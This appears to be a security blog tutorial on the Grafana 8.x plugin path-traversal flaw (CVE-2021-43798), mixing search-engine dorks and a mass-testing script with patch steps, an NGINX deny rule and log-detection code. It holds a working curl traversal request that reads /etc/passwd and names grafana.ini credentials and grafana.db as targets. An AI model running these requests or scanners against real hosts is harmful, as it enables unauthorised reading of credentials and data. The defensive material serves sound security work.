
Introduction
Local File Inclusion (LFI) vulnerabilities allow attackers to read sensitive files on a server by manipulating file paths. Grafana, a popular analytics platform, shipped such a flaw in its 8.x series: the handler that serves plugin assets under /public/plugins/<plugin-id>/ did not confine the requested file name to the plugin's own directory, so a `../` sequence reads any file the Grafana process can open (tracked as CVE-2021-43798, affecting 8.0.0-beta1 through 8.3.0). Strictly speaking this is a path-traversal file read rather than an inclusion, but the shorthand LFI is used throughout. This article provides a step-by-step guide to identifying, exploiting, and mitigating the flaw.
Learning Objectives
- Identify vulnerable Grafana instances using search engine dorks.
- Exploit LFI using a crafted `curl` command.
- Apply mitigation strategies to secure Grafana deployments.
You Should Know
1. Identifying Vulnerable Grafana Instances
Use these dorks to find exposed Grafana 8.x dashboards that are candidates for the LFI. A version match is a lead, not proof: the dorks' upper marker `v8.2.7` is itself a patched release, and the body strings are taken from the login page, so always confirm with the traversal request in the next section.
FOFA Dork
(cert.subject.cn="target.com" || domain="target.com") && app="grafana" && port="3000" && (icon_hash="2123863676" || icon_hash="1884118115" || icon_hash="-928274465") && (body="v8.0.0-beta1" || body="v8.0.0" || ... || body="v8.2.7")
Steps:
1. Navigate to FOFA.
2. Paste the dork and filter results by port:3000.
3. Verify the Grafana version string in the response body.
ZoomEye Dork
(ssl.cert.subject.cn="target.com" || domain="target.com") && (app="grafana" || product="grafana") && port=3000 && (http.body="v8.0.0-beta1" || ... || http.body="v8.2.7")
Steps:
1. Use ZoomEye.
2. Apply the dork to find Grafana instances.
Shodan Dork
ssl.cert.subject.cn:"target.com" product:grafana http.favicon.hash:2123863676,1884118115,-928274465 port:3000
Steps:
1. Search on Shodan (replace `target.com` with the domain in scope).
2. Confirm the version from the response body or by requesting `/api/health`, which is unauthenticated and returns the version as JSON; Grafana does not advertise its version in HTTP headers.
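Whichever search engine you use, a version string alone is only a lead. The following Python is an added example (not part of the original post, and not Grafana's own code) that pulls the version out of a `/api/health` JSON body or a page fragment such as `v8.0.0-beta1` and decides whether it falls in the affected range. The range and fixed versions are an assumption taken from the public advisory for CVE-2021-43798 (8.0.0-beta1 through 8.3.0, fixed in 8.0.7, 8.1.8, 8.2.7 and 8.3.1); the sample health bodies are constructed, not captured from real hosts.

```python
import json
import re

# Assumption for this example, from the public advisory for CVE-2021-43798:
# 8.0.0-beta1 through 8.3.0 are affected; the first fixed patch level per 8.x minor is below.
# Anything outside 8.0-8.3 is treated as not in the affected range.
FIXED_PATCH_BY_MINOR = {0: 7, 1: 8, 2: 7, 3: 1}

VERSION_RE = re.compile(r"v?(\d+)\.(\d+)\.(\d+)(?:-([0-9A-Za-z.]+))?")


def parse_version(text):
    """Extract (major, minor, patch, prerelease) from '8.2.0', 'v8.0.0-beta1' or a chunk of
    HTML that embeds the version. Returns None when no version is present."""
    m = VERSION_RE.search(text)
    if not m:
        return None
    major, minor, patch, pre = m.groups()
    return int(major), int(minor), int(patch), pre


def is_affected(version_text):
    """True when the version sits below the fixing patch level for its 8.x minor.
    Pre-releases such as 8.0.0-beta1 count as below 8.0.7 and are therefore affected."""
    parsed = parse_version(version_text)
    if parsed is None:
        return False
    major, minor, patch, _pre = parsed
    if major != 8 or minor not in FIXED_PATCH_BY_MINOR:
        return False
    return patch < FIXED_PATCH_BY_MINOR[minor]


def triage_health(body):
    """Classify a /api/health JSON body ({"commit": .., "database": .., "version": ..})."""
    data = json.loads(body)
    version = data.get("version", "")
    return {"version": version, "affected": is_affected(version)}


# Constructed sample /api/health responses (not real hosts)
SAMPLES = {
    "grafana-a": '{"commit":"abcdef0","database":"ok","version":"8.2.0"}',
    "grafana-b": '{"commit":"abcdef0","database":"ok","version":"8.2.7"}',
    "grafana-c": '{"commit":"abcdef0","database":"ok","version":"9.0.1"}',
}

if __name__ == "__main__":
    for name, body in SAMPLES.items():
        result = triage_health(body)
        verdict = "LIKELY AFFECTED" if result["affected"] else "not in affected range"
        print(f"{name}: {result['version']} -> {verdict}")
```

Feed it the body of `curl -s http://host:3000/api/health` for each dork hit; a hit in the affected range still needs the traversal request below before you call it vulnerable, since a backported fix or a forked build can carry any version string.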
2. Exploiting LFI in Grafana
Use this `curl` command to test for LFI. `--path-as-is` is essential: without it curl collapses the `../` segments client-side and sends `/etc/passwd`, which never reaches the plugin handler. The plugin id (`alertlist` here) must exist on the target; any installed panel or datasource plugin id works, and extra `../` beyond the filesystem root is harmless because the server's path cleaning stops at `/`:
curl --path-as-is -s -i "http://[target.com]:3000/public/plugins/alertlist/../../../../../../../../etc/passwd"
Steps:
1. Replace `[target.com]` with the vulnerable host.
2. If successful, the server answers 200 with the contents of `/etc/passwd`. The same request reads any other file the Grafana service account can open; on package installs `/etc/grafana/grafana.ini` (secret_key, datasource and SMTP credentials) and `/var/lib/grafana/grafana.db` are the high-value targets.
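Why the request works is easier to see in a few lines of code than in prose. The block below is an added example, written for this article and not taken from Grafana's source: it models the bug class with POSIX path strings, first the vulnerable pattern (join the client-supplied file name onto the plugin directory and serve whatever it resolves to), then the hardened pattern (resolve, then refuse anything that leaves the plugin directory). The plugin root `/var/lib/grafana/plugins` is an assumed layout for illustration; nothing touches the disk.

```python
import posixpath

# Assumed plugin directory for this example; the real layout of a Grafana install is not
# needed to show the bug class. All paths are handled as POSIX strings.
PLUGIN_ROOT = "/var/lib/grafana/plugins"


def resolve_unchecked(plugin_id, requested, plugin_root=PLUGIN_ROOT):
    """Vulnerable pattern: glue the client-supplied tail onto the plugin directory and serve
    the result. normpath collapses the '..' segments, and any '..' that would climb above '/'
    is simply dropped, which is why over-traversing with eight '../' still lands on /etc/passwd."""
    return posixpath.normpath(posixpath.join(plugin_root, plugin_id, requested))


def resolve_checked(plugin_id, requested, plugin_root=PLUGIN_ROOT):
    """Hardened pattern: resolve first, then refuse any result that is not inside the plugin's
    own directory. This also rejects an absolute 'requested' value, which posixpath.join would
    otherwise let replace the base entirely. On a real filesystem, resolve symlinks
    (os.path.realpath) before the prefix check so a linked file cannot point outside."""
    base = posixpath.normpath(posixpath.join(plugin_root, plugin_id))
    target = posixpath.normpath(posixpath.join(base, requested))
    if target != base and not target.startswith(base + "/"):
        raise PermissionError(f"refusing path outside {base}: {requested!r}")
    return target


if __name__ == "__main__":
    traversal = "../../../../../../../../etc/passwd"
    print("unchecked:", resolve_unchecked("alertlist", traversal))
    print("checked:  ", resolve_checked("alertlist", "module.js"))
    try:
        resolve_checked("alertlist", traversal)
    except PermissionError as err:
        print("checked:  ", err)
```

The prefix check is deliberately done on the normalised result rather than by scanning the input for `..`: a denylist misses encodings and alternative separators, whereas "does the resolved path start with the directory I intended to serve from" is the property that actually matters.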
3. Mitigation Strategies
Patch Grafana
Upgrade to a release that contains the fix: 8.3.1, one of the 8.0.7 / 8.1.8 / 8.2.7 backports, or anything newer. On Debian/Ubuntu with Grafana's APT repository:
sudo apt update && sudo apt install --only-upgrade grafana && sudo systemctl restart grafana-server
Confirm the running version afterwards with `curl -s http://localhost:3000/api/health`.
Restrict File Access
Until the upgrade lands, have the reverse proxy in front of Grafana reject any request whose raw URI carries a dot-dot segment. Denying `location /public/plugins/` outright is not a fix: that path serves the panel and datasource plugin assets the UI needs, NGINX matches `location` against the normalised URI (so a traversal request no longer starts with /public/plugins/ by the time the rule is evaluated), and `proxy_pass` without a URI part forwards the client's original path untouched. Add this inside the `server` block of the NGINX config instead; `$request_uri` is the raw, undecoded request line, and the case-insensitive match also catches `%2e%2e` and `..%2f` encodings:
if ($request_uri ~* "(^|/)\.\.(/|%2f|$)|%2e%2e") {
return 403;
}
4. Detecting LFI Attempts
Grafana only writes request paths to its own log when `router_logging = true` is set in the `[server]` section of grafana.ini; otherwise search the reverse proxy's access log. The pattern `public/plugins/.../` matches any three characters, not a traversal, so anchor on a literal dot-dot segment and its percent-encoded form:
grep -rEi 'public/plugins/[^ ]*(\.\./|%2e%2e)' /var/log/grafana/ /var/log/nginx/
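A grep misses double-encoded payloads and gives no context. The following Python is an added example (not part of the original post) that parses access-log lines, percent-decodes the path until it stops changing so that `%2e%2e` and `%252e%252e` both surface as `..`, and flags traversal attempts under /public/plugins/ together with the client IP and status code. The five log lines are constructed for the example and do not come from real traffic; the "combined" log format is assumed.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (nginx "combined" format) for a reverse proxy in front
# of Grafana. They are invented for this example, not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [07/Dec/2021:10:01:02 +0000] "GET /public/plugins/alertlist/module.js HTTP/1.1" 200 4123 "-" "Mozilla/5.0"
198.51.100.7 - - [07/Dec/2021:10:01:09 +0000] "GET /public/plugins/alertlist/../../../../../../../../etc/passwd HTTP/1.1" 200 1803 "-" "curl/7.68.0"
198.51.100.7 - - [07/Dec/2021:10:01:15 +0000] "GET /public/plugins/alertlist/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/grafana/grafana.ini HTTP/1.1" 200 9011 "-" "python-requests/2.26.0"
198.51.100.7 - - [07/Dec/2021:10:01:21 +0000] "GET /public/plugins/alertlist/%252e%252e/%252e%252e/var/lib/grafana/grafana.db HTTP/1.1" 404 153 "-" "python-requests/2.26.0"
10.0.0.9 - - [07/Dec/2021:10:02:00 +0000] "GET /api/health HTTP/1.1" 200 63 "-" "kube-probe/1.21"
"""

# client ip, timestamp, method, path and status from a combined-format line
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)


def fully_decode(path, rounds=3):
    """Percent-decode until the string stops changing (bounded), so single- and
    double-encoded dot segments both become a literal '..'."""
    for _ in range(rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path


def is_plugin_traversal(path):
    """True when a request under /public/plugins/ contains a '..' segment after decoding.
    Backslashes are folded to '/' so a Windows-style separator cannot hide a segment."""
    decoded = fully_decode(path).replace("\\", "/")
    if not decoded.startswith("/public/plugins/"):
        return False
    return any(segment == ".." for segment in decoded.split("/"))


def scan(log_text):
    """Return (client ip, status, decoded path) for every traversal attempt in the log text."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m and is_plugin_traversal(m["path"]):
            hits.append((m["ip"], m["status"], fully_decode(m["path"])))
    return hits


if __name__ == "__main__":
    for ip, status, path in scan(SAMPLE_LOG):
        print(f"[!] {ip} {status} {path}")
```

A 200 on a flagged line means the file was served and the host should be treated as compromised to the extent of whatever that file held; a 403 or 404 still records an attacker probing you and is worth an alert on its own. The same `is_plugin_traversal` check can be dropped into a SIEM parsing rule or a Grafana router log once `router_logging` is on.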
5. Automating LFI Testing
Use this Python script to test multiple targets. `requests` sends the `../` segments unchanged, so no equivalent of curl's `--path-as-is` is needed; the check looks for a passwd-style `root:` line at the start of a 200 response rather than the word "root:" anywhere, which an error page could also contain:
import requests
PAYLOAD = "/public/plugins/alertlist/../../../../../../../../etc/passwd"  # same traversal as the curl check
targets = ["http://target1:3000", "http://target2:3000"]  # replace with in-scope hosts
for target in targets:
try:
response = requests.get(target + PAYLOAD, timeout=10, allow_redirects=False)
except requests.RequestException as exc:
print(f"[-] {target}: {exc}")
continue
if response.status_code == 200 and response.text.startswith("root:"):
print(f"[+] Vulnerable: {target}")
What Undercode Say
- Key Takeaway 1: Unpatched Grafana instances are low-hanging fruit for attackers.
- Key Takeaway 2: Dorking simplifies reconnaissance for mass exploitation.
Analysis:
LFI vulnerabilities in Grafana highlight the risks of improper path sanitization. Organizations must prioritize patch management and network segmentation. Future attacks may combine LFI with RCE exploits, escalating breaches. Proactive monitoring and hardening are critical.
Prediction
As Grafana adoption grows, automated bots will likely scan for LFI flaws. Zero-day exploits could emerge, necessitating real-time threat intelligence integration.
For more cybersecurity insights, follow Securetackles.
Reported By: Muhammad Usman – Hackers Feeds